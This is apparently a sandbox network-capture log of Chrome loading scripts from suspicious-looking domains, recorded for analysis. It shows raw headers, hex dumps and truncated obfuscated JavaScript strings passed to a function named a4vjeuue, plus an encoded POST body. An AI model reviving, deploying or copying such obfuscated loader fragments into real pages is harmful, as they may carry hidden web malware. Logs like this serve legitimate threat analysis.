                                                                                                                                                          2024-06-09 22:41:15 UTC3620INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 54 6c 77 46 30 41 61 41 62 77 48 45 42 62 4e 41 4d 51 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 64 6b 6b 45 70 77 43 55 5a 41 45 54 4d 6b 49 41 41 52 4a 32 41 4a 30 34 64 52 41 62 67 44 79 59 41 46 59 67 4f 41 4f 67 41 6d 49 52 70 7a 51 67 41 43 6e 4a 51 51 51 63 39 67 45 39 4d 41 30 51 48 30 6e 49 4a 41 46 6b 55 65 35 67 42 73 51 6f 38 67 41 33 4b 42 39 6d 45 48 6f 41 51 67 41 47 41 46 38 68 5a 57 43 35 4b 54 51 41 58 6b 35 4d 55 55 59 41 4c 51 30 41 47 56 45 68 45 69 51 30 6e 54 52 4d 4e 45 4b 35 4e 49 79 49 57 67 42 4e 41 48 4d 43 6b 68 67 53 73 72 6c 43 6e 78 54 4d 64 4e 45 6f 6d 41 68 47 5a 74 37 33 41 42 5a 47 57 67 4c 43 6c 42
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATlwF0AaAbwHEBbNAMQC4AzAVzRgBcBLdTdkkEpwCUZAETMkIAARJ2AJ04dRAbgDyYAFYgOAOgAmIRpzQgACnJQQQc9gE9MA0QH0nIJAFkUe5gBsQo8gA3KB9mEHoAQgAGAF8hZWC5KTQAXk5MUUYALQ0AGVEhEiQ0nTRMNEK5NIyIWgBNAHMCkhgSsrlCnxTMdNEomAhGZt73ABZGWgLClB


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          457192.168.2.55022790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:15 UTC552OUTGET /pc/240516-03/static/js/components/iconSvg.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:15 UTC640INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:15 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 760
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:50 GMT
                                                                                                                                                          ETag: "6645caca-2f8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[3],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE1[295],EU-GER-frankfurt-GLOBAL1-CACHE1[292,TCP_MISS,294],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: fc57b787cae4bf31980fdc9ceec8de16
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823393
                                                                                                                                                          X-CCDN-Expires: 768607
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:15 UTC760INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 64 67 47 59 42 64 41 47 67 47 38 41 69 41 52 67 44 63 41 4e 41 4e 6b 6f 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 4a 68 36 6b 51 70 4a 41 45 6f 71 48 4a 43 41 41 45 53 48 67 43 63 2b 76 53 67 47 34 41 38 6d 41 42 57 49 58 67 44 6f 41 4a 69 44 5a 38 30 49 41 41 71 4b 55 45 45 49 70 34 42 50 54 4b 4d 6f 42 39 56 79 43 51 42 5a 46 49 59 34 41 62 45 45 6f 4b 57 69 68 2f 44 68 41 57 41 45 49 41 42 67 42 66 63 54 55 41 5a 53 55 7a 41 48 4e 53 41 43 45 55 46 45 43 6f 4e 44 56 51 78 56 6b 30 41 46 35 79 4e 43 67 41 57 30 6a 4b 46 58 51 41 57 69 52 61 4e 4f 43 49 61 77 67 6b 46 6e 4a 36 74 41 42 68 66 79 67 6b 4c 76 4a 48 57 78 59 55 35 54 51 4d
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgGYBdAGgG8AiARgDcANANkoC4AzAVzRgBcBLdJh6kQpJAEoqHJCAAESHgCc+vSgG4A8mABWIXgDoAJiDZ80IAAqKUEEIp4BPTKMoB9VyCQBZFIY4AbEEoKWih/DhAWAEIABgBfcTUAZSUzAHNSACEUFECoNDVQxVk0AF5yNCgAW0jKFXQAWiRaNOCIawgkFnJ6tABhfygkLvJHWxYU5TQM


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          458192.168.2.550223183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:15 UTC547OUTGET /ftl/commonPage/js/countUp/countUp.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:15 UTC706INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 2080
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-QD-MP-02-09
                                                                                                                                                          ETag: W/"5d848f4f-1be4"
                                                                                                                                                          Date: Fri, 07 Jun 2024 18:34:30 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Sun, 07 Jul 2024 18:34:30 GMT
                                                                                                                                                          Age: 187605
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;qdmp02:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-QD-MP-02-09
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-15
                                                                                                                                                          X-Cdn-Request-ID: 48c5b60df34de656d8750fa3a03fb03f
                                                                                                                                                          2024-06-09 22:41:15 UTC2080INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 18 db 72 e3 b6 f5 5d 5f 71 32 d3 89 a8 15 ad 8b 93 69 66 ac f5 6e d3 8d b7 cd 4c f6 32 9b 4d 5e 1c 3f 50 24 24 31 a6 08 06 00 2d 39 1b ff 4b bf a2 1f d0 fe 58 ce 01 08 10 a0 28 b9 4e c3 19 5d 78 70 6e 38 77 60 fa 6c 30 00 7c 52 5e 97 ea 87 6a f2 b3 d4 af cb 7b f8 5b 5e 72 b1 4e ca fc 76 30 78 36 1d 0c a6 53 50 89 58 33 05 97 90 67 c0 57 b0 51 db 02 58 c1 b6 ac 54 c0 05 dc 25 82 c0 95 60 77 39 af 65 71 0f 12 57 53 c5 b2 10 75 b7 61 82 19 89 79 b9 06 9e a6 b5 90 c4 5f a2 00 f5 63 52 a0 04 b5 61 c8 af a8 19 dc f3 1a 76 09 92 29 0e 4b b6 ce 4b 48 14 21 b3 32 3b 85 9a 08 91 df b1 06 37 63 69 be 4d 0a 89 d8 65 bd 5d 32 ad 67 03 84 aa 48 52 26 63 7c 5f 25 75 a1 60 a6 29 6a 91 a8 9c 97 48 e1 fe 22 0d 9a 63 6b 5e 50 0f c9 52 5e 66
                                                                                                                                                          Data Ascii: r]_q2ifnL2M^?P$$1-9KX(N]xpn8w`l0|R^j{[^rNv0x6SPX3gWQXT%`w9eqWSuay_cRav)KKH!2;7ciMe]2gHR&c|_%u`)jH"ck^PR^f


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          459192.168.2.55022923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:15 UTC559OUTGET /pc/240516-03/static/js/components/382/footerNav.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:15 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:15 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 4224
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:38 GMT
                                                                                                                                                          ETag: "6645cabe-1080"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[4],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE26[4],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473793
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 613a853f4e7d83acc7df925c21b17a8f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118207
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:15 UTC4224INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 48 41 4e 67 48 59 42 64 41 47 67 47 38 41 52 41 47 51 42 73 42 7a 41 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4d 6c 53 6e 41 4a 54 6b 41 76 71 51 41 4b 41 44 32 6f 41 6d 46 75 79 36 38 30 2f 51 61 53 67 69 41 52 4b 79 51 67 41 42 45 6b 34 41 6e 62 6c 30 30 42 75 41 50 4a 67 41 56 69 43 34 41 36 41 43 59 68 6d 33 4e 43 41 6c 47 55 45 45 45 63 34 41 6e 70 69 63 70 4a 6f 41 2b 6d 45 67 53 41 43 79 4b 45 36 73 74 43 43 61 46 41 42 75 55 4c 53 73 49 49 77 41 68 41 41 4d 6f 6b 4c 6d 61 55 5a 36 72 41 43 38 55 4a 69 61 75 54 41 51 7a 4a 70 43 70 43 6c 6c 35 45 35 51 6e 46 41 4b 48 44 78 38 49 6b 59 67 6e 4b 78 47 61 4f 52 6f 55 43 6d 4d 32 47 51 77
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHANgHYBdAGgG8ARAGQBsBzALgDMBXNGAFwEt1MlSnAJTkAvqQAKAD2oAmFuy680/QaSgiARKyQgABEk4Anbl00BuAPJgAViC4A6ACYhm3NCAlGUEEEc4AnpicpJoA+mEgSACyKE6stCCaFABuULSsIIwAhAAMokLmaUZ6rAC8UJiauTAQzJpCpCll5E5QnFAKHDx8IkYgnKxGaORoUCmM2GQw


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          460192.168.2.55023023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:15 UTC565OUTGET /pc/240516-03/static/js/components/382/footerCopyRight.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:15 UTC626INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:15 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 828
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:37 GMT
                                                                                                                                                          ETag: "6645cabd-33c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[2],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE6[3],EU-FRA-paris-GLOBAL1-CACHE20[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473793
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 8a76059082dd6c4de7a9022fea5f2b2a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118207
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:15 UTC828INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 4c 67 46 67 45 34 42 64 41 47 67 47 38 41 74 41 61 51 48 55 42 50 41 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4d 75 5a 4e 47 52 41 42 4b 43 67 43 49 32 53 45 41 41 49 6b 58 41 45 34 39 75 45 67 4e 77 42 35 4d 41 43 73 51 33 41 48 51 41 54 45 43 78 35 6f 51 41 42 55 55 6f 49 49 52 56 77 61 5a 68 45 67 50 6f 75 51 53 41 4c 49 70 44 62 41 44 59 67 45 70 51 41 62 6c 42 2b 62 43 42 4d 41 49 51 41 44 41 43 2b 6f 6d 71 68 69 72 49 6f 41 4c 77 67 6d 42 49 78 4d 42 41 73 45 71 4a 6b 50 47 6b 55 68 6c 42 63 55 4b 77 63 33 48 78 6f 6d 4f 4b 4b 49 46 78 73 69 6d 67 55 4d 44 59 4d 41 45 6f 38 41 4f 59 41 46 6c 78 4d 45 6b 45 77 68 6d 67 57 35 66 31 4d
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgFgE4BdAGgG8AtAaQHUBPALgDMBXNGAFwEt1MuZNGRABKCgCI2SEAAIkXAE49uEgNwB5MACsQ3AHQATECx5oQABUUoIIRVwaZhEgPouQSALIpDbADYgEpQAblB+bCBMAIQADAC+omqhirIoALwgmBIxMBAsEqJkPGkUhlBcUKwc3HxomOKKIFxsimgUMDYMAEo8AOYAFlxMEkEwhmgW5f1M


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          461192.168.2.550228103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:15 UTC678OUTPOST /zb-cloud/pwv/sn.website.logo.image.url HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 532
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://wns732.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:15 UTC532OUTData Raw: 6a 73 6f 6e 3d 70 77 76 7c 31 33 7c 45 54 68 5a 48 4d 52 61 65 53 59 72 44 6f 45 67 49 30 41 62 58 65 43 74 4a 76 68 33 52 6e 66 33 50 6a 41 32 4b 68 69 33 4e 79 56 6c 59 76 50 79 55 76 53 72 56 6f 74 76 6a 32 35 65 74 4c 49 67 49 66 59 77 48 30 59 68 49 66 46 64 50 69 44 76 4d 68 47 6a 4e 61 4e 79 59 77 45 74 44 55 50 68 6b 32 53 70 49 72 4f 63 52 30 41 67 49 66 5a 6b 77 63 35 33 56 53 46 77 66 42 51 6f 56 6d 76 74 58 32 38 76 71 58 31 75 4c 32 48 70 64 42 47 71 43 43 4b 63 46 42 50 55 4f 50 44 75 79 57 51 74 53 53 31 76 46 51 4e 63 49 57 58 42 48 52 62 44 5a 55 56 6b 70 32 34 67 4d 6e 46 6a 46 30 4e 6e 51 66 52 31 6b 4b 46 35 46 4f 45 75 5a 45 45 58 46 50 45 76 69 4b 55 77 6d 45 6a 69 48 55 59 7a 57 46 41 57 4a 58 46 77 77 4d 53 61 4a 4c 41 63 52 66 44
                                                                                                                                                          Data Ascii: json=pwv|13|EThZHMRaeSYrDoEgI0AbXeCtJvh3Rnf3PjA2Khi3NyVlYvPyUvSrVotvj25etLIgIfYwH0YhIfFdPiDvMhGjNaNyYwEtDUPhk2SpIrOcR0AgIfZkwc53VSFwfBQoVmvtX28vqX1uL2HpdBGqCCKcFBPUOPDuyWQtSS1vFQNcIWXBHRbDZUVkp24gMnFjF0NnQfR1kKF5FOEuZEEXFPEviKUwmEjiHUYzWFAWJXFwwMSaJLAcRfD
                                                                                                                                                          2024-06-09 22:41:16 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:16 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:16 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 36 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          2024-06-09 22:41:16 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:16 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:16 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:16 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:16 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:16 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:41:16 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          462192.168.2.55023123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:15 UTC553OUTGET /pc/240516-03/static/js/components/wrapper.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1860
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:59:00 GMT
                                                                                                                                                          ETag: "6645cad4-744"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE22[15],EU-FRA-paris-GLOBAL1-CACHE29[0,TCP_HIT,13],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2523989
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 1e99d8907d24a90077cadf44cbc2f78b
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 68011
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:16 UTC1860INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 64 67 45 34 42 64 41 47 67 47 38 41 52 53 67 4a 51 45 55 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 7a 56 4a 43 6b 4f 41 53 6e 49 41 69 46 6b 68 41 41 43 4a 42 77 42 4f 58 54 6d 49 44 63 41 65 54 41 41 72 45 4a 77 42 30 41 45 78 42 4d 75 61 45 41 41 56 35 4b 43 43 48 6b 63 41 6e 70 6b 46 69 41 2b 73 35 42 49 41 73 69 6e 30 73 41 4e 69 44 45 4b 41 44 63 6f 58 78 59 51 42 67 42 43 41 41 59 41 58 32 45 56 45 50 6c 70 4c 67 42 65 44 6b 77 78 53 6e 30 41 44 6d 41 78 59 56 4a 35 64 4e 30 30 54 43 35 43 6c 6e 54 4d 36 4a 67 49 4a 67 4c 53 58 32 71 78 41 44 6b 41 54 51 41 50 4e 55 61 55 56 4d 78 35 54 47 46 4d 63 6c 6a 53 44 57 31 4f 54 46 39
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgE4BdAGgG8ARSgJQEUAuAMwFc0YAXAS3UzVJCkOASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKADcoXxYQBgBCAAYAX2EVEPlpLgBeDkwxSn0ADmAxYVJ5dN00TC5ClnTM6JgIJgLSX2qxADkATQAPNUaUVMx5TGFMcljSDW1OTF9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          463192.168.2.55023223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:15 UTC552OUTGET /pc/240516-03/static/js/components/slides.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 57212
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:57 GMT
                                                                                                                                                          ETag: "6645cad1-df7c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[6],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE9[5],EU-FRA-paris-GLOBAL1-CACHE1[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2523989
                                                                                                                                                          x-hcs-proxy-type: 1
